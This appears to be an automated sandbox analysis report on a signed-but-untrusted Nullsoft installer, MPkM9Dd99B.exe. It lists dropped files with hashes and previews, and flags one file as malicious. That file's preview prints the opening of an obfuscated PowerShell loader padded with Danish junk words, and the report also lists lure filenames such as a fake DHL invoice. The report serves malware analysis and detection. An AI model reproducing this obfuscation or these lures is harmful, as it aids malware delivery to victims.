                              Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):340
                              Entropy (8bit):3.133047342265733
                              Encrypted:false
                              SSDEEP:6:kKNO+sC5+7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:vsILkPlE99SCQl2DUeXJlOA
                              MD5:4DDE321792D4318AE85BB820DE0627D3
                              SHA1:6759B31A95442D83B98A06EDE8DA0B4C2DE23149
                              SHA-256:55BC64C7E681D538F7F970CC7F5F3D8518DAB8AAD67BD4A2271911E8D91EE1A9
                              SHA-512:6D453FBB19C463FF29BBDDCE555D70BC5701B13CE487ACC46AD11F107F7D583F07AFBE6346B836D3565EAB8BBBCCE5823BA9F9ECCC7463EAA7B2BB18BE640E6E
                              Malicious:false
                              Preview:p...... ..........i..c..(....................................................... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:modified
                              Size (bytes):53158
                              Entropy (8bit):5.062687652912555
                              Encrypted:false
                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                              MD5:5D430F1344CE89737902AEC47C61C930
                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                              Malicious:false
                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                              Category:dropped
                              Size (bytes):450005
                              Entropy (8bit):1.2479153298421555
                              Encrypted:false
                              SSDEEP:1536:5Gqj4INxXBamclWiYciYWpzOq9QhNsc3xbEzUw:3j4IpamEBWl9usc3w
                              MD5:3056B698C1950649B1C84D88B05A81BE
                              SHA1:4660B44B7301962FB449B39D095242457E57BC36
                              SHA-256:16AE9F0FE3E58D43323048BE82894E12F16A17608B575FE487C22D0EE0909F16
                              SHA-512:4432F2A36003FBDE3B56E0450CEA9C8AE500CEA8A33276F4BB75AA391F2AB273309DC846021A72D6EF15218F99E9303FDDBAACC8667E4E3BFB852DD27A43C5D5
                              Malicious:false
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):342526
                              Entropy (8bit):1.2624311512278965
                              Encrypted:false
                              SSDEEP:768:O9PQagrLcVyo283wsxFu0RY0N1JDi7y1ffv/0JJq/Z9H5KM5vCnOoD2PPWyzReFO:MQbLC3wgK0iuZQDOs0xNfTBk6qxBF
                              MD5:6ADE689B571046AD96876A499FFD4823
                              SHA1:059706B7BA9927E1A956930AC34FE2D4B7213B1B
                              SHA-256:5CF49A3778180D2653A50272127C61430271011A2F6576159911151A0FB993B6
                              SHA-512:23A4628D7CD0464BC8E1AAC6B710495E5D593975432F91CDD2B486C4B34BE3C54492D438EA62B83E4B7F327AE3AB5D94C4BD7403F6307886BE35F4B60B7418A1
                              Malicious:false
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):359061
                              Entropy (8bit):1.2457166424004438
                              Encrypted:false
                              SSDEEP:768:MHp33julIW3oMakaZHsjAq57OSjpLa6E97t0xQwQKdRg+ruVllG7T2MI/BcO98aj:UW3arZHcvZdOyCxcUN03za2kmRb1sGT
                              MD5:A2C0821CDD9A2B5F524F22E0B15B2D37
                              SHA1:ED69EC61DCE2BB759EB79BBD2CE1CEF19E2E4230
                              SHA-256:7725A12FD4A9A40A74A392FA563D9B6473CFA0668A08C85658862463535D01A5
                              SHA-512:C8A4A55E9C963D507E7F0E6CA9F31831AB4D0A847D66EBEA3BD92936B8B370B105264AD4CACD5E54E98DDDE75BAAD8D81DF575B81D2178F05B4997A5FA8563B7
                              Malicious:false
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):329653
                              Entropy (8bit):7.604147316687378
                              Encrypted:false
                              SSDEEP:6144:XquqZis+z2CfsSqVgqbZfFzC5NEM0CcxEWx1LPWSd7hdp1Vi:XRRXzTktVxbdFW5T0LGWrLvdhS
                              MD5:F9F21A8DF53A1F8E3DE905F9E4963150
                              SHA1:52D0A357FE5124FCEC54D86078044E5886939474
                              SHA-256:C50625554E838FDB35C1C05BC6D69E948807762360CBA5F745300C740C12A396
                              SHA-512:81159DEF405928F57B9F1B1CC9BF64CEBCC087BEC305DDD4023C0272C5A8EC94E6F7BFFFE8D4C16FC5374956B4B4D36BA1A03F3BD4767180147138C05E6C0D92
                              Malicious:false
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (4127), with CRLF, LF line terminators
                              Category:dropped
                              Size (bytes):72431
                              Entropy (8bit):5.165216532813141
                              Encrypted:false
                              SSDEEP:1536:2/sna+746/kSu72it+BCJRPQsrNljSAQm9h8YjLANQWLG6:FJU6MSuKi/JFQsevSjENX
                              MD5:853DBC1BD27ACC99B75EBEEAADF24B7F
                              SHA1:A12045A510EA6BD87F1318F922510B327CE785F6
                              SHA-256:ADED78AC8C05F534138AD2247D41FE187086C5156C979159CDC497BE1C95B068
                              SHA-512:FA3E938E2B5EF93AE8AB4E9D8A0621BE8D9C472BC3D4FD696F735B2D60D89749166D52BFAA31EEFA74DB434127F311871126609E791DB9F5E7BAFE251BCAD424
                              Malicious:true
                              Preview:$Laboratorieenhed=$Feinting;.....<#Ernre Ravelin Deprivationstilstandens #>..<#Wrinkleable Pantisocrat Folklore Odoriphore Marxistens Underskridendes #>..<#Innuendoing Myrmecological Kropspleje Skridtlngdes #>..<#Overtravel Exormia Attacheens #>..<#Millettia Sharpe Kriminaldommer Wilshire Magthaveren Arketypes #>..<#Highbush Tjenesteledigt Brystoperationer Gglerens Cesses #>...$Rubrikannonces = @'.Interna.antical$formi,lMRetsmidiSkibslaslicour.sM crorhi MisshiomozambinFarmerii Nuppeds KiselseBronchorKant nns,arnage=Unsa dl$EksportWFjertekeSpherecnWarata d Gri.eri.oonshicT nomet;Unlikab.TumboaefMembranuLsn ngsnhusvildc,kdernetMonologiPartikeo CanionnAwetosu Und stOI religbPillowls Hognu kChillumnAb orbei RverietSquadroe Frstegt.lagsvreForbr,gnFattiggs Aabnin Unhe it(Immoral$DebitoraDebatt nTvrformkSorteree Gro sulNerve rs nwipedeSerobionBortfile inskhrU fructn GtestaeAssorta,Blackwa$Arm,noiD H.dropkSkittlek EgenfieOvernigtOmphalea ,bcisslIsomerslRo,gerse LsagtirTetrammkSelvangnanskue
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):431949
                              Entropy (8bit):1.2534752844673904
                              Encrypted:false
                              SSDEEP:1536:XD5XWkkXU5F3I19UybYQB/YjqudrPIF2ZwG+vn5:XD5XcXUH3dybYQ9e9ni
                              MD5:869B68360A1E23A86847C3C760305509
                              SHA1:86DCB60824720D475AC688419D65A7DED97C85B9
                              SHA-256:ED306D19437D1188D9DFBE72E23CDFD4B44CCB9092906AA24097043B5D5C3602
                              SHA-512:DDFDC40DC59967BEE331B16998250DBECD7B0AEA93CB599F8D8CF1BE5CF3280987934F7E6A1EEC42D0295158BEF4D645100765EF11C73248163BC2F992129779
                              Malicious:false
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 66520453480448.000000
                              Category:dropped
                              Size (bytes):498522
                              Entropy (8bit):1.2529825290108598
                              Encrypted:false
                              SSDEEP:1536:8RleI23UqaKxWdq82m1gQDx6LN4ACCB1I/gCk+uDs9b:8RD+Wd0m1wLN4ACuIJk
                              MD5:F021AB50CCF26EDC2E90A7EDAD6F7E7B
                              SHA1:A24D9936137E91ED846F928AC2AA741915AED1B8
                              SHA-256:1667714305BCFDD4ABC3F115251D282A4E0517954DB1A9FAC3F74EB7B8AE2014
                              SHA-512:4261905ACC2F9307BC50943856B4EE300ED8F6FF14DD14BEB8BBC37684EA5842935984330C0FA42E9BC5530F2991426A6D91B1A80B3FFA3A4469A63F945E1454
                              Malicious:false
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):349733
                              Entropy (8bit):1.2397864872646107
                              Encrypted:false
                              SSDEEP:768:rwjkYAiCysuvu8hRx0bgnXrNhXKeZNrbxiHfPx+lHTI+PNITz8bwIvGG76LkqWOq:rw0KY+z/hl8VzPBZ6iXc6d
                              MD5:E8A9F81281E8ED1DAA1A9FA98C11DA97
                              SHA1:87BB542C6175A4B51A4C8F4C35B93244B84DF88C
                              SHA-256:0333AE760111805FA8801B65D07659CE36DBDFF05BBCA40F1305238A4E9B94AC
                              SHA-512:87F3741D3EEA36C8559183F4307F7DACE6A3F39971FA813C13DA4C734038E34EF4D70F580CE9F96F0637EAE9093557159A56620FB9DFA51D6DBA882C621837BF
                              Malicious:false
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):413602
                              Entropy (8bit):1.2424037027559116
                              Encrypted:false
                              SSDEEP:1536:n3axPycbUHvtclWN2TTHn3tJqChok8dEhx:EycwHv+lWN+z3jnCfdm
                              MD5:5414789DC51920495C97F8F8CD9EAC2A
                              SHA1:69D800A2463D4B0AEB7AA656EB9037659239C9DB
                              SHA-256:D32BF488FC11B9848CB4A2CC7EDD285D90316558F626833DA0E157BE515A99B7
                              SHA-512:B58A857363EEF41D3861F2D27FEF888A418D383E3F11D4C1F80684E7996539A1A2470C86933C69446FB215D7534A0EDDE12DC85DDC2A4BCDF58009F406C7329D
                              Malicious:false
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):6656
                              Entropy (8bit):5.178709395875687
                              Encrypted:false
                              SSDEEP:96:z0OBtYZKtPsrqBApt1JHpb9XWk7Qe06iE6mE6YNFyVOHd0+uPHwEX:4tZKtrAJJJbP7iEHEbN8Ved0Ph
                              MD5:4A2F4FE4A3AD1DE56EE6BF7DD4923963
                              SHA1:7CC68B94448C964FD99904E5784B059AED4D5DAA
                              SHA-256:89B1E6509A1B45B32933E9D785A9C8C5B9CE7C616E1112DCF7FC3FA5CA27EBDE
                              SHA-512:4B6BBE75BEAFAE9A29932FF5DDD3940AADFAE62C157836E6CDAB755955782DD5354D5EB389B4B8C16BF59F4CE7A099A0161D915C1CF2968F28E195DC8E3997EA
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              • Antivirus: Virustotal, Detection: 0%
                              Joe Sandbox View:
                              • Filename: RzEqKuZBuK.exe, Detection: malicious
                              • Filename: RzEqKuZBuK.exe, Detection: malicious
                              • Filename: vfhlZ0vrbe.exe, Detection: malicious
                              • Filename: vfhlZ0vrbe.exe, Detection: malicious
                              • Filename: HJEbEB40vP.exe, Detection: malicious
                              • Filename: HJEbEB40vP.exe, Detection: malicious
                              • Filename: 004552024107.bat.exe, Detection: malicious
                              • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious
                              • Filename: Order 00293884800595.bat.exe, Detection: malicious
                              • Filename: 004552024107.bat.exe, Detection: malicious
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):3.1656305928731805
                              Encrypted:false
                              SSDEEP:96:FItIUzbK9nw1I+NwZsrvnxqY6229IcxkZ+DqYcbI+SAlcJEiJLJwIQsx:FIBK9nsIQQgn0Jzaadq7bjfOEiHNQsx
                              MD5:13D71B4D5184944373F88FDD891BE962
                              SHA1:055CEF4D129D0BF49E76ACF2BB454E6925597505
                              SHA-256:92A74CC605E4DF8415B6704B2B26278F1C9886D50904343EBE0E49FB0444943D
                              SHA-512:65C695F9A8335369F45CD1D2E2FFD985C5DA32DA9C9C93FC6F7419FD3FCB64CF68D6726983521FDC782C8BE50035463C71287A11E5674A69D71019B5539DC10E
                              Malicious:false
                              Preview:....P...P.......................................P...!...........................(.......,..^....................eJ.......B...c..Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................D.f............4C..c..........S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.5.0.1.1.1...0.2.2.2.0.7...1.0.6...1...e.t.l.......P.P.(.......,..^....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                              Category:dropped
                              Size (bytes):17126
                              Entropy (8bit):7.3117215578334935
                              Encrypted:false
                              SSDEEP:192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
                              MD5:1B6460EE0273E97C251F7A67F49ACDB4
                              SHA1:4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
                              SHA-256:3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
                              SHA-512:3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
                              Malicious:false
                              Preview:MSCF............D................|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM...*......z.;......t.<.o..|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A...*.H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0...*.H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...*
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                              Category:dropped
                              Size (bytes):24490
                              Entropy (8bit):7.629144636744632
                              Encrypted:false
                              SSDEEP:384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
                              MD5:ACD24F781C0C8F48A0BD86A0E9F2A154
                              SHA1:93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
                              SHA-256:5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
                              SHA-512:7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
                              Malicious:false
                              Preview:MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$*...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y*.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G.*..`-=.w....m..2y.....*o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                              Category:modified
                              Size (bytes):19826
                              Entropy (8bit):7.454351722487538
                              Encrypted:false
                              SSDEEP:384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
                              MD5:455385A0D5098033A4C17F7B85593E6A
                              SHA1:E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
                              SHA-256:2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
                              SHA-512:104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
                              Malicious:false
                              Preview:MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f|..g.7..6..].7B..O..#d..]Ls.k..Le...2.*..&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...*G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,.....*.1.:-....K.......M..;....(,.W.V(^_.....9.,`|...9...>..R...2|.|5.r....n.y>wwU..5...0.J...*.H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                              Category:dropped
                              Size (bytes):30005
                              Entropy (8bit):7.7369400192915085
                              Encrypted:false
                              SSDEEP:768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
                              MD5:4D7FE667BCB647FE9F2DA6FC8B95BDAE
                              SHA1:B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
                              SHA-256:BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
                              SHA-512:DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
                              Malicious:false
                              Preview:MSCF.....+......D...............[I...........+...I..........d.......rM..............environment.cab...Q.!+rMCK.|.XT....CI7.....AR..$..C$D....RA:....T..........o...g...>.....s....z...>..<...J.R.A......%}..... 0............\...e.z...@..{..,./.:9:X8.s^q...>.(]...I)....'..v@....!.(.i.n.!.g.8\/.+X3.E.~.pi...Q...B...."Oj..~.:....M....uB.}..v.WR........tDD......D7..j..`..5..E.2.z..C....4.s....r..Y.:.|.mtg...S..b._.....!.~Kn..E.=...x.N..e.)....xz...p..h.;..xR'...U.}........nK.+.Y........p..r _.;?.m}$..*%&...8. 7..T....,7..F...e...kI.y...q....".W.W..[..gZQ.....W.$k.T"...N.*...5.R...,+...u.~VO...R-......H7..9........].K....]....tS~*.LSi....T....3+........k......i.J.y...,.Y|.N.t.LX.....zu..8......S*7..{y.m.....Ob.....^.S8Kn.i.._.c~.x.ce.A...t........S.......i1......V..S]H....$..J....E..j...4...o.$..).....;.n<.b.}.(.J.]...Q..u,.-.Bm.[z.j..-i.."...._v.......N..+...g..v..../...;G.Yw....0..u...z....J..K.E..s&..u.h3.]J.G............Z....=.N.X..
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Entropy (8bit):7.49524760839857
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:MPkM9Dd99B.exe
                              File size:1'352'888 bytes
                              MD5:2afc878d1fcfb41b15beafb1faab9edb
                              SHA1:97cf12f3fd3d4e6fa6010d05fdfa8e7d3cbeba55
                              SHA256:8f05778ed21cceef05e278694c609c70659bdc5fc7a975630224c922544689f0
                              SHA512:32bd0b94355f1011411a3bb6f38b029a128361621fde68e16e49ea21ab46fbb899295b7b6f89d543aca8933f285b10fad94feaa14df1a1276d8b42709844eb4f
                              SSDEEP:24576:HdcS1TkwkTy/6WLFtT2xNB9NID3Fg3+oTc6oIU:9X1Tkw+yisT2xD9NI5gOoT9nU
                              TLSH:4855D0E3A6110E89C67E82FD8657C154510A6F7ED868D60E31B3362EFDF2D478C4E84A
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................h...x.......3............@
                              Icon Hash:fd3ecf696931318d
                              Entrypoint:0x4033d8
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x660843F9 [Sat Mar 30 16:55:21 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:671f2a1f8aee14d336bab98fea93d734
                              Signature Valid:false
                              Signature Issuer:CN=Modificeret, O=Modificeret, L=Fellows, C=US
                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                              Error Number:-2146762487
